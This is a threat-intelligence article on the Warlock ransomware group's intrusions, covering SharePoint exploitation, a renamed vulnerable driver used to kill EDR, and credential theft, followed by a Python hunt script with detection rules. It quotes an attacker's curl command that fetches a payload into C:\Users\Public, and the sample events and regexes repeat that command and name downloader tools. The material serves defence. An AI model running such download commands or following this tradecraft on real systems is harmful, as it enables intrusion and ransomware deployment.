Warlock Ransomware Deployed via Compromised GOLD SALEM Networks and Bypassed Security Solutions


Counter Threat Unit (CTU) researchers are tracking a sophisticated threat actor known as Warlock Group, which CTU designates as GOLD SALEM.

Since March 2025, the group has compromised enterprise networks and bypassed security solutions to deploy its custom Warlock ransomware.

While Microsoft refers to this collective as Storm-2603 and associates it “with moderate confidence to be a China-based threat actor,” CTU researchers have not confirmed any geographic attribution.

Through mid-September 2025, GOLD SALEM published 60 victims to its dedicated leak site, placing it in the mid-range of ransomware operations by victim count this year.

Targets span small commercial firms, government agencies, and multinationals across North America, Europe, and South America.

Uncharacteristically, the group avoided Chinese and Russian organizations until September 8, when a Russia-based engineering services provider in the electricity generation sector appeared on the leak site.

This inclusion suggests the actors may operate from outside jurisdictions that aggressively pursue ransomware extortionists.

GOLD SALEM’s Tor-hosted leak site batches victim listings, and as of September 16, only 19 victims (32%) had their stolen data published, while 27 (45%) were reportedly sold to private buyers.

GOLD SALEM leak site as of September 16, 2025.

GOLD SALEM has posted the names of victims compromised by different ransomware operations.

Initial Access and Tradecraft

The group first surfaced publicly via a June 2025 post on the RAMP underground forum, soliciting exploits for enterprise applications (Veeam, ESXi, SharePoint) and tools to kill endpoint detection and response systems.

Such figures may be inflated, and three previously listed victims were removed, possibly after data validation or ransom payment. The group’s leak site assigns each victim a ransom countdown date, typically 12–14 days post-listing, to pressure swift payment.

Countdown dates listed on GOLD SALEM’s DLS as of September 16, 2025.

It remains unclear whether these posts were intended to support direct intrusions by the group or to recruit affiliates for a ransomware-as-a-service model.

CTU researchers observed the group exploit Microsoft SharePoint using the ToolShell exploit chain, leveraging CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 to plant an ASPX web shell. Through this shell, attackers executed commands such as:

```text
curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt
```

This downloaded a Golang-based WebSockets server, granting persistent remote access. The group bypassed EDR by renaming a vulnerable Baidu Antivirus driver (CVE-2024-51324) to googleApiUtil64.sys, enabling termination of security agents.

Post-compromise activities included credential harvesting with Mimikatz targeting LSASS memory, lateral movement via PsExec and Impacket, and deployment of the Warlock payload through Group Policy Objects.

In August, GOLD SALEM abused the open-source Velociraptor DFIR tool to establish Visual Studio Code network tunnels, illustrating the group’s adaptable tooling and its willingness to repurpose legitimate utilities for malicious ends.

Mitigations

To defend against this threat, organizations should maintain aggressive patching for internet-facing services and implement continuous attack surface monitoring.

Proactive endpoint monitoring and rapid incident response are critical to detect zero-day exploitation. Sophos protections Troj/WebShel-F and Troj/Warlock-B can identify related activity.

CTU researchers recommend reviewing and restricting access using the following indicators:


Organizations should validate the published indicators against network and endpoint telemetry and ensure robust segmentation to limit lateral movement.

Continuous threat hunting for signs of ToolShell exploitation and BYOVD techniques can further reduce the risk posed by GOLD SALEM’s evolving Warlock ransomware operation.
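The following hunt script is an added example, not part of the original article or the CTU report. It runs simple detection rules over a constructed process-creation and driver-load feed (all sample events, hostnames and the signer string are made up) for the tradecraft described above: an IIS worker (w3wp.exe) spawning a downloader after web shell deployment, a payload staged under a vendor-named folder in C:\Users\Public, a binary masked with a trailing .txt extension, a BYOVD driver such as googleApiUtil64.sys loaded from a user-writable path or carrying a name that does not match its signer, and Velociraptor launching a VS Code tunnel.

```python
import re

# Constructed sample events (not from the CTU report): a minimal process-creation /
# driver-load feed in the shape an EDR or Sysmon export might take.
EVENTS = [
    {"kind": "process", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c curl -L -o c:\users\public\Sophos\Sophos-UI.exe "
                r"hxxps://file-share.example/wsocks.exe.txt"},
    {"kind": "driver", "image": r"c:\users\public\googleApiUtil64.sys",
     "signer": "Example AV Vendor Co. (constructed signer, not Google)"},
    {"kind": "process", "parent": "Velociraptor.exe", "image": "code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"kind": "process", "parent": "explorer.exe", "image": "curl.exe",
     "cmdline": r"curl -L -o C:\Users\alice\Downloads\report.pdf https://intranet.example/report.pdf"},
    {"kind": "driver", "image": r"c:\windows\system32\drivers\tcpip.sys", "signer": "Microsoft Windows"},
]

WEB_WORKERS = {"w3wp.exe"}                      # IIS worker process hosting SharePoint
DOWNLOADERS = re.compile(r"\b(curl|certutil|bitsadmin|wget)\b", re.I)
PUBLIC_DROP = re.compile(r"c:\\users\\public\\", re.I)
DOUBLE_EXT = re.compile(r"\.(exe|dll|sys)\.(txt|png|jpg|pdf)\b", re.I)
USER_WRITABLE = re.compile(r"^c:\\(users|programdata|windows\\temp)\\", re.I)

def hunt(events):
    """Return (rule_name, event) pairs for events matching the Warlock TTPs above."""
    hits = []
    for ev in events:
        if ev["kind"] == "process":
            cmd = ev["cmdline"]
            # Web shell tell: the IIS worker spawning a downloader (post-ToolShell activity)
            if ev["parent"].lower() in WEB_WORKERS and DOWNLOADERS.search(cmd):
                hits.append(("webshell_download", ev))
            # Payload staged under a vendor-named folder in the world-writable Public profile
            if DOWNLOADERS.search(cmd) and PUBLIC_DROP.search(cmd):
                hits.append(("public_profile_drop", ev))
            # Executable disguised with a benign trailing extension (wsocks.exe.txt)
            if DOUBLE_EXT.search(cmd):
                hits.append(("masked_extension", ev))
            # Velociraptor launching a VS Code tunnel for remote access
            if "velociraptor" in ev["parent"].lower() and re.search(r"\bcode(\.exe)?\s+tunnel\b", cmd, re.I):
                hits.append(("vscode_tunnel", ev))
        elif ev["kind"] == "driver":
            # BYOVD: driver loaded from a user-writable path, or a google* file name
            # whose Authenticode signer is not Google (renamed vulnerable driver)
            name = ev["image"].rsplit("\\", 1)[-1].lower()
            if USER_WRITABLE.search(ev["image"]) or (name.startswith("google") and "google" not in ev["signer"].lower()):
                hits.append(("byovd_driver", ev))
    return hits
```

Each rule is deliberately narrow; in production the path and signer checks should be joined to driver-load telemetry that includes the file hash so that known vulnerable drivers can be matched regardless of file name.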
